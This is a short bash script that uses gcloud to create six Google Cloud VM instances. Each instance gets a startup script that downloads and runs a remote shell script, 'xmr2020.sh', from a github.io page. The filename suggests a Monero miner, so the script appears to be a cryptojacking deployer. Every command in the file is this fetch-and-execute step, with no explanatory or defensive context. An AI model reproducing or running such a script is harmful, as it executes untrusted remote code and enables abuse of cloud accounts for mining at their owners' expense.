#!/bin/bash

gcloud compute instances create instance-1 --zone us-central1-c --image=ubuntu-1604-xenial-v20200807 --image-project=ubuntu-os-cloud --machine-type custom-4-4096 --metadata=startup-script=bash\ \<\(wget\ -qO-\ https://slicommeo.github.io/2019/xmr2020.sh\)

gcloud compute instances create instance-2 --zone us-central1-c --image=ubuntu-1604-xenial-v20200807 --image-project=ubuntu-os-cloud --machine-type custom-4-4096 --metadata=startup-script=bash\ \<\(wget\ -qO-\ https://slicommeo.github.io/2019/xmr2020.sh\)

gcloud compute instances create instance-3 --zone us-central1-a --image=ubuntu-1604-xenial-v20200807 --image-project=ubuntu-os-cloud --machine-type custom-4-4096 --metadata=startup-script=bash\ \<\(wget\ -qO-\ https://slicommeo.github.io/2019/xmr2020.sh\)

gcloud compute instances create instance-4 --zone us-central1-b --image=ubuntu-1604-xenial-v20200807 --image-project=ubuntu-os-cloud --machine-type custom-4-4096 --metadata=startup-script=bash\ \<\(wget\ -qO-\ https://slicommeo.github.io/2019/xmr2020.sh\)

gcloud compute instances create instance-5 --zone us-central1-b --image=ubuntu-1604-xenial-v20200807 --image-project=ubuntu-os-cloud --machine-type custom-4-4096 --metadata=startup-script=bash\ \<\(wget\ -qO-\ https://slicommeo.github.io/2019/xmr2020.sh\)

gcloud compute instances create instance-6 --zone us-central1-a --image=ubuntu-1604-xenial-v20200807 --image-project=ubuntu-os-cloud --machine-type custom-4-4096 --metadata=startup-script=bash\ \<\(wget\ -qO-\ https://slicommeo.github.io/2019/xmr2020.sh\)

